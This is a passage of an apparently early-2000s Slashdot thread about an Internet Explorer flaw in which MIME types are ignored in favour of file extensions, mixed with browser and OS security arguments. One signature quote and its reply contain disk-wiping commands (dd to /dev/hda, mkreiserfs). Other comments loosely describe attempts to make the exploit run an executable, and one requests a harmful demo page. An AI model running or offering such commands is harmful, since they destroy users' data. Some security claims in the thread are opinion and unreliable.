      sendmail? bind? hello? Please join us in reality. Linux has the _worst_ security record of _any_ OS that _ever_ existed. Period. I know you don't want to hear this, but here goes. GNU tools were never designed for security. Many had (and probably still do) hard coded buffer sizes (i.e. buffer overflow bugs). Quite a few tools have been rewritten, but I'm sure many are still exploitable. RMS never wanted a secure OS. He simply wanted a OS with all source code he could use as he pleased. I like Linux, and that is what I currently use 99% of the time. You seem to come across as a bit of a anti-Microsoft fanatic, with the tired abbreviation "M$".

    5. Re:Slander? by arkanes · · Score: 1

      Umm... part of the whole POINT of this thread is that MS doens't tell people about it's vulnerabilities, prefering to hide them and fix them (or not!) in the next version.
      Some other numbers from securityfocus.com:
      Number of OS Vulnerabilities by Year

      OS 1997 1998 1999 2000 2001
      RedHat 6 10 47 95 54
      Windows NT/2000 10 8 78 97 42

      And unformatted because of silly slashdot *bonk*

    6. Re:Slander? by Glanz · · Score: 1

      WRONG>>>WRONG M$ """"says"""" it has released that. It is a lie.

      --
      Rien n'est plus beau que le creux du 0.
    7. Re:Slander? by Glanz · · Score: 1

      Congrats!! That is the most laughable defense of MICRO$LOP products I have ever seen!!!

      --
      Rien n'est plus beau que le creux du 0.
    8. Re:Slander? by Anonymous Coward · · Score: 0

      Sendmail and Bind? But wait, if they're exploitable, they're exploitable on any OS. Sorry, counting these are the same as counting WarFTPd, Wingate and MDaemon bugs in with the MS bug count...

      If you want to compair security records now, I think we all see who's winning/losing by leaps and bounds.

    9. Re:Slander? by Anonymous Coward · · Score: 0

      Linux would still be losing. Remember the 2.0.xx security flaws? People could crash your machine via ICMP or some such. And there are many more instances.

    10. Re:Slander? by Anonymous Coward · · Score: 0

      Nice comeback kid. Now go back to playing 1337 juarez h@ck3r and downloading mp3s. Let us adults live in reality.

    11. Re:Slander? by Glanz · · Score: 1

      A $3,000 game boy IS NOT ny reality.

      --
      Rien n'est plus beau que le creux du 0.
    12. Re:Slander? by Anonymous Coward · · Score: 0

      That is pure bullshit. MS isn't doing some big cover-up. That conspiracy theory shit needs to die.

    13. Re:Slander? by Anonymous Coward · · Score: 0

      MS re-implimented all those in Win 9X also, so MS is still way ahead in the race for the most bugs.

    14. Re:Slander? by Bert64 · · Score: 0

      Sendmail and bind are multi platform, and are as vulnerable under solaris, irix, aix, hp-ux, bsd or whatever else you run them on. and several distributions of linux ship without them, or with alternatives. If you want to talk about linux vulnerabilities, talk about the ptrace bug in the kernel recently...
      As for redhat releasing more advisories than microsoft, this is for many reasons.. for one thing redhat ships with MUCH more software, and they admit to, and fix security problems.. instead of trying to hide them. Also much of the software on redhat is multi platform, so you have multiple vendors checking the code base... and the open source nature of much of the software makes it easier for independent auditors to check for vulnerabilities.
      Imagine how many bugs in microsoft software would be discovered if the code was released to the public..

      --
      http://spamdecoy.net - free throwaway anonymous email - avoid spam!
  226. Magic Lantern v0.7a by mattr · · Score: 1

    "the beta test"

    1. Re:Magic Lantern v0.7a by SpaceLifeForm · · Score: 1
      "the beta test"

      Are you sure it's still in beta?
      It may have been in place for quite some time now,
      and you wouldn't even know it.

      This mess gives more weight to the theory that all of these holes in m$ code are strictly intentional.
      (with FBI, NSA, CIA blessings of course)

      Those of you that use or have used PGP or GPG on windows machines,
      I have a question for you:

      Are you absolutely positive that your secret passphrase has not *ALREADY* been stolen?

      --
      You are being MICROattacked, from various angles, in a SOFT manner.
  227. Opera takes memory and doesn't give it back. by Futurepower(tm) · · Score: 2


    I agree it is a bug in the OS. It is Matrox video cards. The problem is that, in some cases, Opera takes memory and doesn't give it back. There is a huge memory leak somewhere, it seems, that has been there for more than a year.

    --
    Bush's education improvements were
  228. I did test it by autopr0n · · Score: 2

    sent an EXE as an audio file. It was automaticaly downloaded and I got an error message saying that it was an invalid audio file.

    Sending an .txt file with a win32 program file in it (renamed .exe) and it will ask you if you want to open or save or whatever. If you click 'open' it opens in notepad. Weirdly, a regular text file sent with a mime type saying that it's an exicutable will just show up as a regular text file.

    I'm using IE6, though. And some comments seem to be saying this only affects IE5. So who knows. I've posted URLs for my expirements on slashdot,here, here, and here

    --
    autopr0n is like, down and stuff.
  229. What details? by autopr0n · · Score: 2

    First of all: Test what? Details of the bug have not been released. So only your own arrogance validates your "test" of this bug.

    What details are you talking about. They are all spelled out clearly in the article. Change the mime type of an EXE and it gets run. Only it doesn't. I've tried it both ways (having an .exe with some other mime type with an external viewer, and having an .exe renamed named to .txt and sent as an executable). The program never ran.

    --
    autopr0n is like, down and stuff.
    1. Re:What details? by Wolfger · · Score: 1

      The details I am talking about are these: "The vulnerability affects IE for Windows versions 5, 5.5, and 6, said Pynnonen. Citing the severity of the flaw, he refused to release technical details about the method he found for bypassing the browser's system for securely handling downloaded files. "

      I find that actually reading the articles usually helps...

  230. Re: MOD PARENT UP !!! by Tim+C · · Score: 2

    Not entirely; as I understand it, Konqueror and Explorer work in pretty-much the same way, eg the HTML redering is taken care of by a seperate library/DLL, that is available for use by any application.

    When I set IE to warn about cookies once, SQL Server Enterprise Manager later warned me about a cookie when I was browsing the db I was adminstering (this was about 2 years ago now).

    Cheers,

    Tim

  231. Re:Try this at home (or "not just a threat, also a by richc · · Score: 1

    Actually this is probably a symptom of the most irritating thing about IE from a development standpoint. With NS or anything else you can have many versions installed on one machine, with IE I haven't found a way of installing multiple versions (I don't believe there is one due to integration with the OS) hence you need multiple systems to test with multiple browsers before you even start testing with multiple OS.

  232. Re:Try this at home (or "not just a threat, also a by richc · · Score: 1

    I've had a similar problem trying to pipe a pdf through an access rights system, the fix was to hack an extra parameter onto the end of the URL so you end up with something like

    http://abc.def.ghi/dostuff?zxy=123&x=x.pdf

    which is horrible, but works.

  233. Ok, then lets uninstall it. by jotaeleemeese · · Score: 1

    Cars' steering wheels are also free when you buy a car. Lets remove them.

    Nah, bad example.

    A MS car would have somehow linked the stero system to the car's engine, so if you remove the stereo system the car would not start.Needless to say the MS stereo plays only copy protected, MS sanctioned square CDs and the only way to use another stereo is to install it somewhere else in the car. Much better analogy.

    --
    IANAL but write like a drunk one.
  234. Re:ummm...did you EVEN READ THE EULA you AGREED TO by Sheetrock · · Score: 1
    Just because something is written in a contract doesn't always mean that it is legally binding. Still, it is better IMHO to avoid 'signing' contracts that you don't agree with and can't amend.

    I can't help but wonder if we'd have a software industry left if developers became completely liable to the individual for lousy products. How does one prove that his program fails because Windows sucks? How does Microsoft prove that Windows sucks because hardware manufacturers write crappy drivers for inconsistent peripheral interfaces? How could Free Software survive in an environment where it is still impossible to write once, run anywhere?

    There is a middle ground, I'm sure, but we're not going to get there as long as software developers are the only ones writing the rules regarding liability for faulty software development.

    --

    Try not. Do or do not, there is no try.
    -- Dr. Spock, stardate 2822-3.




  235. Caring only about money is a miserable way to live by Futurepower(tm) · · Score: 2


    "Microsoft doesn't audit their software because *IT ISN'T COST EFFECTIVE YET*. Not until people demand security will MS start doing this. It hasn't happened yet."

    I agree that Microsoft does not audit their software. That seems obvious.

    Yes, Microsoft has more to audit, but they have more full-time programmers, too.

    What you are basically saying is that Microsoft doesn't care about being trustworthy, they care only about money.

    I never would have guessed that Open Source software would replace the software from a giant company, but that is will continue happening if Microsoft does not care for its customers.

    --
    Bush's education improvements were
  236. This script turns off HTML in outlook. V. Useful! by SomethingOrOther · · Score: 1

    Courtasy of The Register
    The article tells you how to download and install a DLL that turns off HTML in M$ Lookout

    --
    Anyone quoted by a reporter knows how little they understand
    Don't believe what you read is the truth.
  237. Re:Try this at home (or "not just a threat, also a by Darby · · Score: 1

    with IE I haven't found a way of installing multiple versions

    Ouch!

    I usually test it with NS and IE (various versions) on a Mac and NS and IE on the other monitor under VirtualPC under a few versions of windows.
    I ask friends running a whole grip of different combos to look at it too before I release it.

  238. Re:Try this at home (or "not just a threat, also a by Anonymous Coward · · Score: 0

    IE 6 is NOT beta software, and if you took your head out of your arse, you would know it.

  239. Mozilla no way by Anonymous Coward · · Score: 0

    So, accordnig to the slashdot people, I should switch to Netscape/mozilla. another wanna-be monopolist. Guess I'll have to take this for granted:

    - Default startup with TWO error msgboxen !! (nerdscape .lock file found ANd cannot locate server register)

    - Mysteriously disappears from the desktop from time to time -though ps reveals its still running

    - If a page is not found, the error is 'cannot locate keyword.nerdscape.com' .. which made me really really angry once, resulting in a thrashed keyboard. Can I get a refund on that?

    talking about crappy browsers!! I found IE on solaris more stable than nerdscape (except for outlook)

    BTW I still have a three-year old html script that will instantly crash any netscape browser up to the latest mozilla. I'll be working on the 'vanished netscape instance exploit' from now on!!

  240. Re:Try this at home (or "not just a threat, also a by Darby · · Score: 1

    It's been released for what, like a week?
    That *is* still beta regardless if it's from MS or not.

  241. Re:Try this at home (or "not just a threat, also a by Otto · · Score: 3, Interesting

    I had a similar problem once, when I had to make a CGI that would send back a spreadsheet to be passed off to the right application from either Netscape or IE. The eventual solution was to change the content-type slightly for each browser, and for IE to append a fake parameter with the right extension so IE would open it correctly.

    It was a workaround for IE, really, Netscape handled it fine with the correct content-type. IE didn't handle it correctly unless you munged the content-type AND added that fake extension...

    --
    - Give a man a fire and he's warm for a day, but set him on fire and he's warm for the rest of his life.
  242. Hmm the possibilities... by rastachops · · Score: 1

    Well why doesnt someone setup a page that uses this exploit... hmmm... :
    Difficult bits:
    - gain access to msn.com

    Easy bit:
    - Code a virus (some may say saviour?) that:
    uninstalls IE
    installs Mozilla
    sets slashdot as homepage.

    Hmm now im sure M$ would fix the bug quick enough if that was done!

    1. Re:Hmm the possibilities... by rastachops · · Score: 1

      PS: Then set this page as the homepage for msn.com, hitting M$ hard :)

  243. Re:Now that this particular cat is out of the bag. by Anonymous Coward · · Score: 0

    The effects of joining #*,0 are server side. Client independant.

  244. Re:Mod parent up by Anonymous Coward · · Score: 0
    A poor design can cause obscurity as much as closed development can

    This is a great quote! Mod it up please!

  245. Upgrade by Fuzzums · · Score: 1

    If I were M$ I wouldn't write a patch either.
    I would write a new and more expensive OS without the 'feature'. Thereby forsing all the users to upgrade.

    And actually, it might be cheeper for M$ to do instead of writing a patch.

    --
    Privacy is terrorism.
  246. Re:Try this at home (or "not just a threat, also a by Anonymous Coward · · Score: 0

    It's been out for months.

  247. I am Confused! by Anonymous Coward · · Score: 0

    This is all so confusing. Is this the same as the Microsoft bug(s) that I read about last week? Or is this a spiffy brand new Microsoft bug?

    This brings security through obscurity to a new level! Not only are all of the bugs obscure, but there are so impossibly many of them lately, that no mere mortal can keep track any more. Is there a patch for this or was it applied already last week? Is this one brand new and is there a patch hiding somewhere in MSN that nobody knows about yet? What is about to come next week? Or has Microsoft just given up!?

  248. Maybe he just hasn't gotten that far by barzok · · Score: 2

    Did you consider that maybe he was testing & debugging small pieces (maybe to make sure the app logic was right?) before testing everything more thoroughly?

  249. MS and Mime types by mtippett · · Score: 1

    I have been stung by this too.

    The MS Update page downloads a CSV dataset and renders it. The MS javascript on that page would get confused by the fact that the CSV data that I was downloading and was marked as text/html would be modified (validly) by our application. Since we added HTML to the CSV data since we treated it as text/html it would get confused.

    I have an outstanding support request with MS, but they tried to convince me that since under IE it works normally it was not a bug.

    I have a write up at http://www.ticons.com.au/~mtippett/msdownload.txt if anyone wants to annoy microsoft with their own bugs!

    We lost a customer because of it, so give them hell!

    1. Re:MS and Mime types by GigsVT · · Score: 4, Informative

      This is all just more of the same. I have come to expect it from MS.

      My experience with this is that certain web hosting providers (ConcordEFS, today's ebiz) refuse to send correct content-type headers for flash animations, since it "works in IE"(tm).

      IE will guess the content type, and ignore what the server says -- real web browsers listen to the server. So it makes admins lazy, makes MS's browser monopoly stronger, and makes other browsers look broken.

      I just wish that the people who don't think MS is a monopoly, abusing their power, had to deal with these little monopolistic tactics every day. If they did, then MS would be no more.

      --
      I've had enough abrasive sigs. Kittens are cute and fuzzy.
    2. Re:MS and Mime types by foobar104 · · Score: 2

      Remember Asimov's Law: "Never attribute to malice what can adequately be explained by ignorance or stupidity."

      This isn't a "monopolistic tactic." It's just a design flaw that slipped through QA and out into the world. Nobody in Redmond is tenting their fingers and muttering "Excellent."

      Conspiracy theorists please get off at the next stop.

    3. Re:MS and Mime types by GigsVT · · Score: 1

      Are you serious? Seems to me it would take much more effort to ignore the server specified mime type, and do your own guessing as to what type of file it is.

      They went out of their way to avoid doing it the right way. I don't see how that could be considered ignorance or stupidity.

      --
      I've had enough abrasive sigs. Kittens are cute and fuzzy.
    4. Re:MS and Mime types by Anonymous Coward · · Score: 0

      Maybe they don't know the right way?

      That's very unlikely. More likely, they just did not forsee all the consequences.

    5. Re:MS and Mime types by foobar104 · · Score: 2

      They went out of their way to avoid doing it the right way. I don't see how that could be considered ignorance or stupidity.

      First of all, it's incredibly arrogant to talk about this in terms of "right way" and "wrong way." As far as implementation goes, it seems like one person's idea of "wrong way" is "a way dissimilar to what I think ought to have been done."

      When you write your own web browser that is feature-for-feature, capability-for-capability equivalent to Internet Explorer, then you're qualified to talk about "right way" and "wrong way." Until then, it's all just opinion.

      And secondly, it seems pretty clear that Internet Explorer and Windows Explorer share a lot of code; it's very reasonable-- to me, anyway-- to imagine that they reused some of the code that went into Windows Explorer's file type heuristics in Internet Explorer. Everything we've been bitching about simply falls into the category of unintended consequences.

  250. Re:it would be readme.exe - the crack is on extens by Anonymous Coward · · Score: 0
    -- Hello, my name is Leon Brooks, and I pronounce Windows "dd if=/dev/zero of=/dev/hda". It saves time.

    ..just felt like commenting on your sig. This may not save time with certain harddisks; the firmware on some disks tries to read the partition table when it powers up. The command above would fuck up the partition table and will cause weird errors. mkreiserfs /dev/hda? may save some more time:)

  251. It's so simple by someone_took_my_nick · · Score: 1
    I use galeon (Mozilla) for web browsing.
    I use balsa for email.
    I use gmc (not nautilus yet) for file browsing.

    Why do these three tasks always have to be made into one huge application that has to take over your computer?

  252. schools and public institutions, that's who by ColGraff · · Score: 2

    Man, I'm sitting in my high schoo, right now using IE 5.0 because that's what the computers in my school shipped with, and our one computer tech doesn't have the time to install a new browser on all the comps, and train the clueless teachers and students in their use. And frankly, why should my school have to lose security because of this? It's microsoft's job to ship a quality product (in theory), and they aren't doing that. IT isn't the victim's fault.

    --
    I'm the stranger...posting to /.
    1. Re:schools and public institutions, that's who by mark_lybarger · · Score: 1

      who was the one who "taught" them how to use the IE 5.0 browser? who was the one who originally installed the ie 5.0 browser? a 30-60 minute crash course? they alreay have it at home? what?

      if security and choice were choice were important, both these issues could have been mute from the get-go. had the initial install included NN or Opera or whatever as the default browser, and no noticible signs of the IE browser, these issues would be mute.

      M$ _should_ ship a quality product, they're not obligated to as far as i know. IT, the computer tech, whoever is responsible to know what software they're providing and weather it meets the technical and functional requirements of the users. Weather or not this is neglect or neglegance on the part of M$ is usually left for the courts to decide.

    2. Re:schools and public institutions, that's who by cyclist1200 · · Score: 0

      "and train the clueless teachers and students in their use."

      I didn't realize IE skills didn't translate to other browsers.

      Must be hard for our educators to find that back button.

    3. Re:schools and public institutions, that's who by Anonymous Coward · · Score: 0

      First off, if anybody out there actually reads this, congratulations for wanting to read what I have to say even though slashdot thinks what I have to say isn't important because I don't want to make an account to say it. As we all know, if you want to say something anonymously then it must not be worth reading, right? That's why law enforcement never investigates anonymous tips.

      Anyhow, back on topic. I maintain three different labs at a middle school in my small northern Canadian school. On all our workstations (which are Macintosh, by the way) we use Microsoft Internet Explorer. I tried loading Opera on all machines so people would have a choice, and it worked well for about a month, and then you know what happened? The demo version expired and I had to remove Opera from all 80 workstations. Opera never got around to releasing a new version (which of course would expire several months later anyway) until 3 months. It's not that hard removing software from multiple workstations with Network Assistant, but I should not have had to in the first place. Now they're all running MSIE 5, because it never expires, and to be honest, it's just as fast as Opera on Macintosh systems. Opera's website claims that Opera is the "fastest browser on earth." Bullshit. MSIE 5 is just as fast as Opera on any system I've tested it on. I've also found that both MSIE and Opera are absolutely HORRIBLE at rendering javascript code on the Macintosh. Try loading up http://www.palm.com/ on MSIE on the Macintosh, browse through the software downloads and pay attention to the lengthy busy-pointer pauses while it just sits there and does nothing. Now try it on Netscape on the Macintosh, or MSIE on the PC. Notice it's instantaneous? Maybe I'll load Netscape on the workstations here, just for shits and giggles.

    4. Re:schools and public institutions, that's who by mark_lybarger · · Score: 1

      nothing wrong with posting anonymously, just most people usually browse at +1 to filter garbage comments. do you like to weed through trash to look for treasure?



      i have to assume your workstations are running the mac os? sorry, i don't know much about the os at all, not it's software. is this reported bug even a bug for mac os? isn't there a version of opera that doesn't expire? oh wait you're running a demo version. next you talk about loading NN on your work stations. if there is a version of NN that works on your system, why haven't you?

    5. Re:schools and public institutions, that's who by stonecypher · · Score: 1

      > First off, if anybody out there actually reads this, congratulations for wanting to read what I have to say even though slashdot thinks what I have to say isn't important because I don't want to make an account to say it.

      I got about that far.

      --
      StoneCypher is Full of BS
  253. I would like to demonstrate this. by ONOIML8 · · Score: 1

    I would like to demonstrate this. Could somone write a HTML document for me this will do something harmless yet dramatic, like shut down the computer? Then email me the link. This way we can all use your HTML to show people what this bug does. A picture is worth a thousand words, but a demonstration HTML would be worth a bunch more Micro$oft systems converted to Linux or Unix.

    --
    . Quit playing Monopoly with Bill. Switch to one of many non-Microsoft products today.
  254. Hmm by underpaidISPtech · · Score: 3, Interesting

    I have been unable to get this to work as described in the article, or by the other attempts posted so far. The closest I have come is to create a Redirect or Rewrite rule that takes a request for a *.txt file and points it to a .bat file (thereby fullfilling the "text" requirement"), which is then soft linked to your malicious executable. This still displays the file's name however. And the dialogue asks you to "run" this program. The extra step of the soft-link bypasses a warning about running the file; if the redirect went straight to the .exe, the browser will complain about security.

    Either way, this is entirely server-side. The article states that simple HTML can pull it off. I am wondering if that is just a smoke screen.

    - I have tried renaming an .exe file to .txt, that just spits binary data at you in Notepad.

    - I tried a cgi (source is here).

    Now, this time the dialogue displays the requested file (.cgi) instead of the executable filename (not a redirect). However, you are then prompted to "choose a program to run this..." which means that the requested file has to have an executable extension, or a known extension. Wav, mp3, mpg won't work as the format is obviously invalid.

    3) I tried messing with the mime.types in Apache, various soft links and combos of all 3 methods. Basically I fail to see how standard HTML without any server-side config or scripting can fool the browser or get it to exec code unwillingly, as described in the article.
    Maybe if I renamed the file to mayIhaveyouradvice.txt.pif or something, but the extension IS displayed to the user. Maybe the average user doesnt pay attention, but its kind of hard to miss.

    Obviously they have ommitted something crucial because (my box - W2K, IE 5.5 SP2) this "bug" is not happening, and it's not happening for other people too. If this is so easy to implement in palin HTML and would affect "millions" then I think other /.ers would have hit on it by now.

  255. Microsoft and MIME by The+G · · Score: 2

    Microsoft has long tried to subvert MIME. In particular, as noted, MIME type is used to determine how to handle a document or attachment, but extension is used to actually handle it. For kicks, try opening an mime type AUDIO/basic document. The most basic possible audio encoding pulls up an error message.
    --G

  256. The thing I love about this one... by Anonymous+Brave+Guy · · Score: 2
    Did I miss anything?

    I think you missed just one little thing in this particular example.

    The original article clearly states that people have been very secretive about the details. For example, it says that the details weren't mailed to Bugtraq at one point, and also that the select few who were given a demo apparently all signed NDAs first.

    What I'd like to know is, how is michael getting all the "inside info" he'd need to justify his comments? What is his source? Unless he's got information he didn't mention, his article appears to be nothing but anti-MS FUD. If he does have that information, why didn't he post it, on a board as skeptical as Slashdot?

    --
    If you disagree, post your argument. (-1, Overrated) isn't your personal censorship tool for views you don't like.
    1. Re:The thing I love about this one... by geekoid · · Score: 2

      if you had an inside "source" would you reveal it?
      I'm not saying he does, just pinting out there can be good reason for not saying you have one.

      --
      The Kruger Dunning explains most post on /. http://en.wikipedia.org/wiki/Dunning%E2%80%93Kruger_effect
    2. Re:The thing I love about this one... by mandolin · · Score: 1
      if you had an inside "source" would you reveal it?


      Yes. Not the identity of the source, but the fact that there is one. You just say "according to an anonymous source/expert," like a TV network might. It shows that you tried to do research at least.

    3. Re:The thing I love about this one... by Anonymous+Brave+Guy · · Score: 2
      Yes. Not the identity of the source, but the fact that there is one.

      Exactly. If you read a credible daily paper, you'll always find that leaks are attributed to "a senior source within the XXX department" or some such. Controversial letters, published anonymously, always note "name and address supplied". There's obviously a degree of trust here, but if any media offering started making false claims in this respect, someone would find out, their reputation would be mud, and without that they have nothing. So, it's a reasonable compromise.

      What we have in this case is a /. editor posting much information as fact, without any source information to support its credibility. However, the article cited makes it clear that the information would be very hard to come by without first signing an NDA. Come on, slashbots, you can add 2 and 2. :-)

      --
      If you disagree, post your argument. (-1, Overrated) isn't your personal censorship tool for views you don't like.
  257. I thought they were the standard! by Zero__Kelvin · · Score: 2


    "Now Microsoft has a problem. Because they chose to ignore the standard for handling downloaded files, Microsoft has painted themselves into a corner."

    I think you guys got this backwards. It seems to me that everyone else is going against the standard by not doing it the Microsoft way. I mean, these guys embrace and extend! Everyone else is just sticking with the old standards, while Microsoft is blazing new ones 8^}

    "Microsoft ... a standard in vulnerability since just after Bill Gates announced that the web was a fad."

    --
    Guns don't kill people; Physics kills people! - John Lithgow as Dick Solomon on Third Rock From The Sun
  258. Hysterical and Innacurate - again! by Simon+Hibbs · · Score: 1

    Michael :

    >Type may be innocuous, but the extension says "execute me", so when
    >the "integrated" IE engine gets ahold of it, the malicious content
    >is automatically executed.

    >If you routinely browse with Internet Explorer or read mail with
    >Outlook, keep in mind that any web page you visit or any email you
    >open can take over your computer, steal sensitive files, destroy
    >your machine, anything.

    I like Slashdot lots, and read it pretty much every time I have net access (most work days +).

    Still, it saddens me that poorly considered, or even deliberately missleading rants like this still slip through as editorial content.

    For this item : 2/10, must try harder.

    Simon Hibbs

  259. I think... by Anonymous Coward · · Score: 0

    I think this is the same flaw they actually patched on the Mac OS X version of IE...

  260. Chroot IE by dezwart · · Score: 1

    Dang, wrong OS.

  261. Bad Things Happen by jsin · · Score: 1

    Vad things happen to stupid people all the time, just check out rotten.com.

    If you think it's normal to blindly click "ok" on that dialog that comes up asking you to either download or execute something, then it's going to happen to you too.

    ...and maybe after you get ripped by a virus or some other malicious code you'll learn your lesson.

    I think it's funny that the people who think this is a valid article are the same ones bashing the lion and lamb garbage...it's the same damn thing.

  262. Are those browsers really IE though? by Dman33 · · Score: 2

    I use Opera and sometimes Mozilla. I have both set to identify as "MSIE 5.0" so I can go to those "Designed for Microsoft only" sites. Anyway, I am sure that this type of thing throws off the stats a bit, doesn't it?

    1. Re:Are those browsers really IE though? by cyclist1200 · · Score: 0

      Possibly, but how much can the difference be? Are the stats for IE actually 83%? 80%? Are they as low as 75%? I don't think it matters whether the final numbers are 75% or 85%, the vast majority still use IE. I'm forced to at work, but luckily I can go home and use Galeon.

  263. Don't be an ass by Anonymous Coward · · Score: 0
    If that post was "legal advice", then the Concorde flies on rubber bands. Discussing a hypothetical legal question is not an ethics violation. In fact, you'd have a hard time getting a decent law education without such discussions.

    If somebody wants to sue, they'll contact a real lawyer and be advised from there.

    God I hate idiots like glrotate.

  264. The "Standard" by Anonymous Coward · · Score: 0

    Is IE. To say it's anything else is short sighted and borders on tunnel vision.

  265. Nope by JediTrainer · · Score: 1

    Using NT4/IE5 and it tried to open with WinZip as it normally would have a ZIP file. Except, of course, WinZip couldn't read it. Your file never got executed.

    --

    You can accomplish anything you set your mind to. The impossible just takes a little longer.
  266. Yay to another misinformation headline by skrowl · · Score: 2, Insightful

    By "completely open" they mean you have to click on an EXE, download it, and choose to open it! WOW what a vulernability!!! OH NO! Opera and Mozilla are also vulernable!!! Ye gods what do we do now?!

    --

    Prevent linux based DDOS's!
    http://linux.denialofservice.org/
  267. How is this different from FTP by jmcnamera · · Score: 1

    So is this worse than the Linux wu_ftp bug that was hidden by obscurity?

    Seems like that was worse since the exploit didn't require user assistance.

    Thanks to Red Hat though for telling us so we can patch our machines. Too bad the GPL public review didn't catch that problem for so long. Ditto for Bind, SendMail...

    --
    this is not a sig
    1. Re:How is this different from FTP by demon · · Score: 1

      wu-ftp has had SO many bugs over the years, no one in their right mind would actually use it. I think there was a long stretch where it sat completely unmaintained, also. I hate to say it, but in the case of wu-ftpd, if you're still running it, it's your own fault for not looking at its track record and saying "hm, there sure have been a lot of bugs... maybe I should use something else".

      Same with Sendmail (there are other, more-secure MTAs which are mostly compatible with Sendmail, not to mention being much easier to configure - Exim, Postfix, even *shiver* qmail). And as far as BIND goes, it should be run chroot()'d, set to a non-root UID and GID, on a box with little else on it Or maybe djbdns would be a better choice.

      --

      Sam: "That was needlessly cryptic."
      Max: "I'd be peeing my pants if I wore any!"
  268. Actually, no, I don't have a choice. by Zathrus · · Score: 2

    I have to use IE at work. There is absolutely no alternative.

    The proxy software that was recently put in place uses Windows Authentication to let you through. Basically this entails logging into the proxy using your NT userid/password - all of which is sent automagically by IE. Without this the proxy won't let you through, not even for DNS.

    So no, I don't have a choice.

    What really sucks is that because of this proxy, there's no ways out of the network either. If I want to telnet to a box out on the net, I can't do it - even if the box has sshd listening on port 80, 119, etc. putty can't connect because it can't get through the proxy.

  269. why flaimbait? by linuxrunner · · Score: 2

    who's the moderator who called the original post "flaimbait"?
    That was a valid response. He likes Opera... hell, I like Opera. And he's correct that the Opera UI with the gesture movements gets addictive. I'll hop on a computer using IE and I find myself trying to go back into history using the right click gesture method.

    Opera is a great browser (I personally prefer 5 instead of 6).

    Someone mod the parent (or mine to get some attention) up. Mod me down for being an ass if you want but moderation like that, on a valid post is uncalled for.

    --
    www.slightlycrewed.com - Because aren't we all?
  270. Encourages server misconfiguration by slim · · Score: 2

    Staying off the security vulnerability side of things, IE's non-conformance to the standard way of determining file type has irritated me for some time. Here's why:

    The HTTP standards dictate that the Content-type: header contains the MIME type of the data which follows. Netscape accepts this; any standards compliant browser does this. IE, however, looks at the filename extension (and even the data itself) and makes decisions based on that.

    This means that if I write some HTML, put it in a file called "text.html", then configure my browser to serve it with "content-type: text/plain", the right thing for a browser to do would be to display the HTML source as text. Some versions of IE think they're far too clever to fall for that one, and just render it as HTML anyway.

    (1): What if I *want* to read the HTML source?

    But more importantly than (1), I've seen proper production servers misconfigured in this way -- don't ask me why, so HTML content is sent with the wrong Content-type header. If the site is tested with IE only, everything will appear to be fine; only when you try and browse the site with another browser does the fault show up.

    Now, what's a non-technical web user going to think when they see this? Are they going to think "Hmm, the server is set up wrong"? No, if it works in IE but not in Netscape, they're going to think "Netscape sucks!", and merrily continue using IE.
    This despite the fact that IE is the one that's behaving wrongly.

    I won't go as far as to suggest that this behaviour was put in as a deliberate ploy, but if someone else wanted to, I wouldn't argue with them...

  271. Re:Does anyone at /. read the articles in the post by mark_lybarger · · Score: 1

    and how is this patch going to get on people's machines the don't know how to install a friggin operating system? they just double-click on the blue "e" on the desktop and type where they want to go - presto after a few minutes of dialing the page shows up. patches are great for people who are aware enough. nimbda, code red, etc all had patches BEFORE or just shortly after the virus hit. why did it then infect tons of computers, annoy almost every single web server log file, and contine for months? m$ software is intended for an audience of people who don't know jack about computers, and in that respect they should be held legally and financially obligated to provide bullet-proof software. NN and others are intended for those who know better so should be expempt. any other industry which identifies a bug in it's product issues a public recall of the product to correct the problem (say a finds that it had a line of DVD's that the laser was set too high at the factory, those would be recalled yesterday)

  272. Is metadata more secure? by moonsammy · · Score: 2, Interesting

    File extensions seem to me to be a safer way to manage filetypes - on any Mac OS prior to X all you had to do to fool a user into running a spoofed program was to change the filename extension and icon (say, make an application with a .jpg extension and a quicktime image file icon). The os runs the file based on the actual file type and creator codes when it is double-clicked, and those codes are typically invisible to the user, so someone could very easily open a malicious program instead of, say, some downloaded pr0n.
    At least with file extensions as the absolute identification of file type you can't be tricked (ignoring the method discussed in this article), and a .jpg will always be opened as a .jpg, even if its just a renamed .exe

    1. Re:Is metadata more secure? by babbage · · Score: 1
      I think what you're actually saying is that, in current implementations, file extensions might be a safer way of representing type metadata than hidden type & creator codes, and you might be right. But I think the important point that you miss is that file extensions can be spoofed too -- look at all the windows script viruses that had an extension like file.jpg.vbs, and people fell for it by the millions.

      The problem here isn't metadata -- filetype is a metadata aspect that can be encoded in a variety of ways, including up front ones like extensions and more obscure ones like type codes, but that doesn't mean one or the other is "more" metadata-esque.

      The best approach is not to get rid of it, but to come up with an interface that shows as much of it as possible -- or at least the core aspects like filetype information. Both the Mac Finder and the Windows Explorer can show this info by default when you browse by list view. The next step -- and it could be tricky to balance security against usability here -- would be to make it difficult to munge the associations derived from filetype data, so no easy to mask foo.gif.exe files, no maskable type or creator codes. I don't know what the best way to do this might be, though I think that the Unix magic number system is a pretty clever hack that could be useful here, if computationally expensive to implement (but then with modern hardware, who cares?).

    2. Re:Is metadata more secure? by Aqualung · · Score: 2
      Quoth the babbage:

      But I think the important point that you miss is that file extensions can be spoofed too -- look at all the windows script viruses that had an extension like file.jpg.vbs, and people fell for it by the millions.

      Ahh, but the problem here isn't with the actual file extension, the issue comes with Windows' handling of said extension. If my memory serves me correctly, default on Win98+ is to hide the file extensions from the user as much as possible, and include a mime-type description in the left frame of the IE file system browser... So, for example, the file "foo.jpg" would be visible in the window as just "foo" and would have an image icon. When someone sends a file like "foo.jpg.vbs" to a windows user, with the default setup, the .vbs is stripped, leaving the filename "foo.jpg" in the file browser... looks like an innocuous jpeg file. This is what was causing the problems with that type of "exploit".

      --

      - Dave
  273. Re:Try this at home (or "not just a threat, also a by vittal · · Score: 1

    You may be able to make IE behave better by tagging a Content-Disposition header along in your HTTP response.

    Its not in the HTTP spec, but is a proper MIME header (http://www.oac.uci.edu/indiv/ehood/MIME/rfc2183.t xt).

    IE sometimes takes note of Content-Disposition's 'filename' parameter to figure out what extension jiggery-pokery it should call.

    I say sometimes, because you can still run up against IE deciding that the first few hundred bytes of your file look like HTML so *obviously* the file is html, regardless of content-type, content-disposition, filename and untold sacrifices to the gods *sob!* :(

    v

  274. Insecure mode. by Tony-A · · Score: 1

    Realize that IE is insecure and start moving everything that matters out of reach. It's not like the patch for this this will fix all the yet to be discovered holes. Cheap trick is Find all the *script* thingees and delete/change their names. Changing names is probably better just in case someone really needs the function.

  275. 2 the people complaining that the article is wrong by t_allardyce · · Score: 1

